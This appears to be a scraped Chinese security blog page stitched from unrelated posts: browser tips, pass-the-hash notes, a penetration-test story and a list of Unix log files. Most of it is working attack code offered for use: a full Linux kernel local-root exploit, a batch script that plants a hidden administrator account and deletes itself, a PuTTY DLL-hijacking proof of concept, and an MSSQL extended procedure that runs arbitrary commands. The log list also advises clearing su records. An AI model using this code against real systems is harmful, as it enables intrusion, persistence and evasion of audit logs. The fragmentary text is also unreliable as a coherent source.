减少缓存文件所占用的内存:
1.在地址栏中输入“about:config",回车
2.找到"browser.sessionhistory.max_total_viewer"
3.将其值设为 0
加快Firefox加载页面的速度:
1.在地址栏中输入“about:config",回车
通常浏览器加载一个页面只连接一个线程,而如果你启用“pipelining",它会多线程加载,这将加快记得浏览器速)。
阅读全文...
去年我介绍过一个HASH注入工具:内网渗透新杀器,这里有个简明用法
作者:BlAck.Eagle[B.H.S.T]
(前几天写的个总结,方便记忆)结合新出的内网渗透工具wce来讲解下pass-the-hash技术,就是我们平时说的HASH注入。
1.
为什么要进行HASH注入?
Hash破解不出来或者省时省力
我们先简单的看下原理:
UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的 痕迹,UNIX系统存放LOG文件,普通位置如下:
/usr/adm - 早期版本的UNIX
/var/adm - 新一点的版本使用这个位置
/var/log - 一些版本的Solaris,linux BSD,Free BSD使用这个位置
/etc - 多数UNIX版本把utmp放在这里,有些也把wtmp放在这里,syslog.conf在这里
下面的一些文件根据你所在的目录不同而不同:
acct 或 pacct -- 记录每个用户使用的命令记录
access_log -- 主要当服务器运行NCSA HTTPD时, 记录什么站点连接过你的服务器
aculog -- 保存着你拨出去的MODEMS记录
lastlog -- 记录了用户最近的LOGIN记录和每个用户的最初目的地,有时是最后不
成功LOGIN的记录,当一个用户登陆到unix系统,注册程式在lastlog文件中查找该用户的uid,如果该程式找到了
该用户的uid,unix就会显示最后一次登陆的时间和tty(终端号)
loginlog -- 记录一些不正常的LOGIN记录
messages -- 记录输出到系统控制台的记录,另外的信息由syslog来生成
security -- 记录一些使用UUCP系统企图进入限制范围的事例
sulog -- 记录使用su命令的记录.他通常在/var/adm/sulog.如果你在机器上使用了su命令,别忘了清除哦.
utmp -- 记录当前登录到系统中的所有用户, 这个文件伴随着用户进入和离开系统而不断变化.他还会为系统中的用户保持非常长的历史记录,utmp日志通常存放在/var/adm/utmp目录下.能用w和who命令查看,其他命令也能访问这个文件.如:finger root就能.目前的utmp一般都有utmpx文件作为日志记录的补充.
by:vitter@safechina.net
blog:blog.securitycn.net
早就跟相关人员说过 邮箱认证smtp和pop协议要做加密,否则在公司内网,太容易被人sniffer到明文密码了,另外邮箱密码和bbs公用,bbs也是采用的http协 议,没有用https,这些都是问题。虽然我们控制的网络部分已经做过处理了,ip和mac地址做了绑定,即使有人做arp欺骗后,除非不出网关,否则欺 骗后网络到达不了网关之外,因此嗅探明文邮箱密码已经不可能(由于邮箱服务器不在同一网段)。但是对于我们一些共用资源的服务器有公网ip和内网ip且处 于一个相对风险较高,而且没有根据安全级别进行过相应的安全策略的网络环境内,因此一些问题是显而易见的,但是某些人根本不以为然。所以我进行了一次简单 的内部渗透测试。
首先我从有公网ip和内网ip的网络段入手,如公网ip段是222.222.222.0/255.255.255.255,内网ip段192.168.0.0/255.255.255.0。
经过踩点发现222.222.222.77(192.168.0.77)上跑了一个老版本的某php的论坛。经过检测,存在上传漏洞,利用gif89a文件头欺骗漏洞上传webshell。然后上传个nst。
/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -------------
* This is a NULL pointer dereference in the Econet protocol. By itself, it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -------------
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
* * The particular symbols I resolve are not exported on Slackware or Debian
* * Red Hat does not support Econet by default
* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
* Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*/
#include <stdio.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <net/if.h>
#include <sched.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>
/* How many bytes should we clear in our
* function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
/* Why do I do this? Because on x86-64, the address of
* commit_creds and prepare_kernel_cred are loaded relative
* to rip, which means I can't just copy the above payload
* into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{
#ifdef __x86_64__
asm("mov $getroot, %rax; call *%rax;");
#else
asm("mov $getroot, %eax; call *%eax;");
#endif
}
/* Triggers a NULL pointer dereference in econet_sendmsg
* via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
int ret;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
if(ret < 0) {
printf("[*] Failed to set Econet address.\n");
return -1;
}
splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
/* Shouldn't get here... */
exit(0);
}
int main(int argc, char * argv[])
{
unsigned long econet_ops, econet_ioctl, target, landing;
int fildes[4], pid;
void * newstack, * payload;
/* Create file descriptors now so there are two
references to them after cloning...otherwise
the child will never return because it
deadlocks when trying to unlock various
mutexes after OOPSing */
pipe(fildes);
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);
if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
printf("[*] Failed to open file descriptors.\n");
return -1;
}
/* Resolve addresses of relevant symbols */
printf("[*] Resolving kernel addresses...\n");
econet_ioctl = get_kernel_sym("econet_ioctl");
econet_ops = get_kernel_sym("econet_ops");
commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
printf("[*] Failed to resolve kernel symbols.\n");
return -1;
}
if(!(newstack = malloc(65536))) {
printf("[*] Failed to allocate memory.\n");
return -1;
}
printf("[*] Calculating target...\n");
target = econet_ops + 10 * sizeof(void *) - OFFSET;
/* Clear the higher bits */
landing = econet_ioctl << SHIFT >> SHIFT;
payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if ((long)payload == -1) {
printf("[*] Failed to mmap() at target address.\n");
return -1;
}
memcpy((void *)landing, &trampoline, 1024);
clone((int (*)(void *))trigger,
(void *)((unsigned long)newstack + 65536),
CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
&fildes, NULL, NULL, target);
sleep(1);
printf("[*] Triggering payload...\n");
ioctl(fildes[2], 0, NULL);
if(getuid()) {
printf("[*] Exploit failed to get root.\n");
return -1;
}
printf("[*] Got root!\n");
execl("/bin/sh", "/bin/sh", NULL);
}
一段隐藏用户的bat,注意脚本中的$不能去掉
net user chinadu$ 4shell.org /add
net localgroup administrators chinadu$ /add
Echo HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] >>c:/tem.ini
regini c:/tem.ini
regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
net user chinadu$ /del
regedit /s c:\1.reg
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [0] >c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\ [0] >>c:/tem.ini
regini c:/tem.ini
del c:\tem.ini
del c:\1.reg
del %0
Thanks for all
Update For Version 7
Not work for free version.
Build v7.0.20100921 - 22nd September 2010
New Security Check:
Improvements:
Bug fixes:
一个良好的渗透测试是什么组成的?
虽然执行一个渗透测试有许多明显的优点——执行渗透测试的价值在于它的结果。这些结果必须是有价值的,而且对于客户来说必须是很容易理解的。有一个常见的误解是认为渗透测试只是使用一些时髦的自动化安全工具,并处理所生成的报告。但是,成功执行一个浸透测试并不仅仅是需要安全工具。虽然这些自动化安全测试工具在实践中扮演了重要的角色,但是它们也是有缺点的。事实上,这些工具一直无法真正模拟一个高深攻击者的行为。不管安全工具完成的报告有多么全面,其中总是有一些需要解释的问题。
让我们看看构成一个良好渗透测试的一些关键因素:
渗透测试是一种最老的评估计算机系统安全性的方法。在70年代初期,国防部就曾使用这种方法发现了计算机系统的安全漏洞,并促使开发构建更安全系统的程序。渗透测试越来越多地被许多组织用来保证信息系统和服务的安全性,从而使安全性漏洞在暴露之前就被修复。由于恶意代码、黑客、不满员工所造成的网络入侵、数据偷窃和攻击的频率和严重程度会继续增加,所以网络安全漏洞和数据偷窃所造成的风险和代价是极大的。由于企业电子化的兴起及其对安全性的要求,公司网络的远程访问也在增加。事实上,即使网络实现管理的很好,并使用了最新的硬件和软件,也仍然可能受到错误配置或软件缺陷的影响。这可能最终会将敏感信息的访问权限泄漏给入侵者。使用渗透测试工具则能够显著地减少这种情况的发生。
虽然渗透测试的主要目标是发现组织中网络基础架构的安全漏洞;但它也可能有许多次要目标,包括测试组织的安全问题识别和响应能力,测试员工安全知识或测试安全性政策规范等。
/*
Exploit Title: PuTTY DLL Hijacking Exploit (winmm.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 0.60
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -shared -o winmm.dll PuTTY-DLL.c -DWIN32_LEAN_AND_MEAN
PuTTY is a standalone program, so just plop the .dll in whatever directory the binary is in.
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void aux32Message() { hax(); }
DllExport void auxGetDevCapsA() { hax(); }
DllExport void auxGetDevCapsW() { hax(); }
DllExport void auxGetNumDevs() { hax(); }
DllExport void auxGetVolume() { hax(); }
DllExport void auxOutMessage() { hax(); }
DllExport void auxSetVolume() { hax(); }
DllExport void CloseDriver() { hax(); }
DllExport void DefDriverProc() { hax(); }
DllExport void DriverCallback() { hax(); }
DllExport void DrvGetModuleHandle() { hax(); }
DllExport void GetDriverModuleHandle() { hax(); }
DllExport void joy32Message() { hax(); }
DllExport void joyConfigChanged() { hax(); }
DllExport void joyGetDevCapsA() { hax(); }
DllExport void joyGetDevCapsW() { hax(); }
DllExport void joyGetNumDevs() { hax(); }
DllExport void joyGetPos() { hax(); }
DllExport void joyGetPosEx() { hax(); }
DllExport void joyGetThreshold() { hax(); }
DllExport void joyReleaseCapture() { hax(); }
DllExport void joySetCapture() { hax(); }
DllExport void joySetThreshold() { hax(); }
DllExport void mci32Message() { hax(); }
DllExport void mciDriverNotify() { hax(); }
DllExport void mciDriverYield() { hax(); }
DllExport void mciExecute() { hax(); }
DllExport void mciFreeCommandResource() { hax(); }
DllExport void mciGetCreatorTask() { hax(); }
DllExport void mciGetDeviceIDA() { hax(); }
DllExport void mciGetDeviceIDFromElementIDA() { hax(); }
DllExport void mciGetDeviceIDFromElementIDW() { hax(); }
DllExport void mciGetDeviceIDW() { hax(); }
DllExport void mciGetDriverData() { hax(); }
DllExport void mciGetErrorStringA() { hax(); }
DllExport void mciGetErrorStringW() { hax(); }
DllExport void mciGetYieldProc() { hax(); }
DllExport void mciLoadCommandResource() { hax(); }
DllExport void mciSendCommandA() { hax(); }
DllExport void mciSendCommandW() { hax(); }
DllExport void mciSendStringA() { hax(); }
DllExport void mciSendStringW() { hax(); }
DllExport void mciSetDriverData() { hax(); }
DllExport void mciSetYieldProc() { hax(); }
DllExport void mid32Message() { hax(); }
DllExport void midiConnect() { hax(); }
DllExport void midiDisconnect() { hax(); }
DllExport void midiInAddBuffer() { hax(); }
DllExport void midiInClose() { hax(); }
DllExport void midiInGetDevCapsA() { hax(); }
DllExport void midiInGetDevCapsW() { hax(); }
DllExport void midiInGetErrorTextA() { hax(); }
DllExport void midiInGetErrorTextW() { hax(); }
DllExport void midiInGetID() { hax(); }
DllExport void midiInGetNumDevs() { hax(); }
DllExport void midiInMessage() { hax(); }
DllExport void midiInOpen() { hax(); }
DllExport void midiInPrepareHeader() { hax(); }
DllExport void midiInReset() { hax(); }
DllExport void midiInStart() { hax(); }
DllExport void midiInStop() { hax(); }
DllExport void midiInUnprepareHeader() { hax(); }
DllExport void midiOutCacheDrumPatches() { hax(); }
DllExport void midiOutCachePatches() { hax(); }
DllExport void midiOutClose() { hax(); }
DllExport void midiOutGetDevCapsA() { hax(); }
DllExport void midiOutGetDevCapsW() { hax(); }
DllExport void midiOutGetErrorTextA() { hax(); }
DllExport void midiOutGetErrorTextW() { hax(); }
DllExport void midiOutGetID() { hax(); }
DllExport void midiOutGetNumDevs() { hax(); }
DllExport void midiOutGetVolume() { hax(); }
DllExport void midiOutLongMsg() { hax(); }
DllExport void midiOutMessage() { hax(); }
DllExport void midiOutOpen() { hax(); }
DllExport void midiOutPrepareHeader() { hax(); }
DllExport void midiOutReset() { hax(); }
DllExport void midiOutSetVolume() { hax(); }
DllExport void midiOutShortMsg() { hax(); }
DllExport void midiOutUnprepareHeader() { hax(); }
DllExport void midiStreamClose() { hax(); }
DllExport void midiStreamOpen() { hax(); }
DllExport void midiStreamOut() { hax(); }
DllExport void midiStreamPause() { hax(); }
DllExport void midiStreamPosition() { hax(); }
DllExport void midiStreamProperty() { hax(); }
DllExport void midiStreamRestart() { hax(); }
DllExport void midiStreamStop() { hax(); }
DllExport void mixerClose() { hax(); }
DllExport void mixerGetControlDetailsA() { hax(); }
DllExport void mixerGetControlDetailsW() { hax(); }
DllExport void mixerGetDevCapsA() { hax(); }
DllExport void mixerGetDevCapsW() { hax(); }
DllExport void mixerGetID() { hax(); }
DllExport void mixerGetLineControlsA() { hax(); }
DllExport void mixerGetLineControlsW() { hax(); }
DllExport void mixerGetLineInfoA() { hax(); }
DllExport void mixerGetLineInfoW() { hax(); }
DllExport void mixerGetNumDevs() { hax(); }
DllExport void mixerMessage() { hax(); }
DllExport void mixerOpen() { hax(); }
DllExport void mixerSetControlDetails() { hax(); }
DllExport void mmDrvInstall() { hax(); }
DllExport void mmGetCurrentTask() { hax(); }
DllExport void mmioAdvance() { hax(); }
DllExport void mmioAscend() { hax(); }
DllExport void mmioClose() { hax(); }
DllExport void mmioCreateChunk() { hax(); }
DllExport void mmioDescend() { hax(); }
DllExport void mmioFlush() { hax(); }
DllExport void mmioGetInfo() { hax(); }
DllExport void mmioInstallIOProcA() { hax(); }
DllExport void mmioInstallIOProcW() { hax(); }
DllExport void mmioOpenA() { hax(); }
DllExport void mmioOpenW() { hax(); }
DllExport void mmioRead() { hax(); }
DllExport void mmioRenameA() { hax(); }
DllExport void mmioRenameW() { hax(); }
DllExport void mmioSeek() { hax(); }
DllExport void mmioSendMessage() { hax(); }
DllExport void mmioSetBuffer() { hax(); }
DllExport void mmioSetInfo() { hax(); }
DllExport void mmioStringToFOURCCA() { hax(); }
DllExport void mmioStringToFOURCCW() { hax(); }
DllExport void mmioWrite() { hax(); }
DllExport void mmsystemGetVersion() { hax(); }
DllExport void mmTaskBlock() { hax(); }
DllExport void mmTaskCreate() { hax(); }
DllExport void mmTaskSignal() { hax(); }
DllExport void mmTaskYield() { hax(); }
DllExport void mod32Message() { hax(); }
DllExport void mxd32Message() { hax(); }
DllExport void NotifyCallbackData() { hax(); }
DllExport void OpenDriver() { hax(); }
DllExport void PlaySound() { hax(); }
DllExport void PlaySoundA() { hax(); }
DllExport void PlaySoundW() { hax(); }
DllExport void SendDriverMessage() { hax(); }
DllExport void sndPlaySoundA() { hax(); }
DllExport void sndPlaySoundW() { hax(); }
DllExport void tid32Message() { hax(); }
DllExport void timeBeginPeriod() { hax(); }
DllExport void timeEndPeriod() { hax(); }
DllExport void timeGetDevCaps() { hax(); }
DllExport void timeGetSystemTime() { hax(); }
DllExport void timeGetTime() { hax(); }
DllExport void timeKillEvent() { hax(); }
DllExport void timeSetEvent() { hax(); }
DllExport void waveInAddBuffer() { hax(); }
DllExport void waveInClose() { hax(); }
DllExport void waveInGetDevCapsA() { hax(); }
DllExport void waveInGetDevCapsW() { hax(); }
DllExport void waveInGetErrorTextA() { hax(); }
DllExport void waveInGetErrorTextW() { hax(); }
DllExport void waveInGetID() { hax(); }
DllExport void waveInGetNumDevs() { hax(); }
DllExport void waveInGetPosition() { hax(); }
DllExport void waveInMessage() { hax(); }
DllExport void waveInOpen() { hax(); }
DllExport void waveInPrepareHeader() { hax(); }
DllExport void waveInReset() { hax(); }
DllExport void waveInStart() { hax(); }
DllExport void waveInStop() { hax(); }
DllExport void waveInUnprepareHeader() { hax(); }
DllExport void waveOutBreakLoop() { hax(); }
DllExport void waveOutClose() { hax(); }
DllExport void waveOutGetDevCapsA() { hax(); }
DllExport void waveOutGetDevCapsW() { hax(); }
DllExport void waveOutGetErrorTextA() { hax(); }
DllExport void waveOutGetErrorTextW() { hax(); }
DllExport void waveOutGetID() { hax(); }
DllExport void waveOutGetNumDevs() { hax(); }
DllExport void waveOutGetPitch() { hax(); }
DllExport void waveOutGetPlaybackRate() { hax(); }
DllExport void waveOutGetPosition() { hax(); }
DllExport void waveOutGetVolume() { hax(); }
DllExport void waveOutMessage() { hax(); }
DllExport void waveOutOpen() { hax(); }
DllExport void waveOutPause() { hax(); }
DllExport void waveOutPrepareHeader() { hax(); }
DllExport void waveOutReset() { hax(); }
DllExport void waveOutRestart() { hax(); }
DllExport void waveOutSetPitch() { hax(); }
DllExport void waveOutSetPlaybackRate() { hax(); }
DllExport void waveOutSetVolume() { hax(); }
DllExport void waveOutUnprepareHeader() { hax(); }
DllExport void waveOutWrite() { hax(); }
DllExport void wid32Message() { hax(); }
DllExport void wod32Message() { hax(); }
DllExport void WOW32DriverCallback() { hax(); }
DllExport void WOW32ResolveMultiMediaHandle() { hax(); }
DllExport void WOWAppExit() { hax(); }
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
hax();
return 0;
}
来源:冰点论坛 2月
主要代码:
在VC6里面新建一个储存过程项目,在proc.cpp中写入如下代码:
#include <stdafx.h>
#include <shellapi.h>
#define XP_NOERROR 0
#define XP_ERROR 1
#define MAXCOLNAME 25
#define MAXNAME 25
#define MAXTEXT 255
#ifdef __cplusplus
extern “C” {
#endif
RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);
#ifdef __cplusplus
}
#endif
RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc)
{
/***************************** 说明 *************************
由于本人人品不好还是怎么的,库里没有srv_paraminfo函数,卧槽,
无赖之下,只好用老式的srv_paramdata
*************************************************************/
int bufLen;
DBCHAR spName[MAXNAME];
DBCHAR spText[MAXTEXT];
DBCHAR spBuf[MAXTEXT];
unsigned char cmdline[255] = “”;
if(srv_rpcparams(srvproc) != 1) return XP_ERROR; //参数判断,如果参数不是1个就立即退出
bufLen = srv_paramlen(srvproc,1);
if(!bufLen) return XP_ERROR;
wsprintf(spBuf,(DBCHAR*)srv_paramdata(srvproc,1));spBuf[bufLen] = ‘\0′; //获取第一个参数的值
wsprintf(spName, “xp_hello”);
wsprintf(spText, “%s Run command:[%s]\r\n\t\t\tMSN:ylbhz@hotmail.com”, spName,spBuf);
srv_sendmsg(srvproc,SRV_MSG_INFO,0,(DBTINYINT)0,(DBTINYINT)0,NULL,0,0,spText,SRV_NULLTERM); //发送消息
wsprintf((char*)cmdline,”/c %s”,spBuf); //构造参数
ShellExecute(0,”open”,”cmd.exe”,(char*)cmdline,NULL,SW_SHOW); //执行命令
return XP_NOERROR ;
}
1、setup_config_box :
putty 的界面的处理方式是很值得研究研究的。 首先要考虑在原有的界面上把新加的输入passowrd 的文本框放在什么地方,个人认为把新加入的文本框放在原有的输入port 端口后面的文本框后面是一个比较好的选择。
修改: line :1155 行的
ctrl_columns(s, 2, 75, 25);
改为
ctrl_columns(s, 3, 50, 25,25);
后面的数字只是一个比例。
添加: line : 1165 后加入:
阅读全文...
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论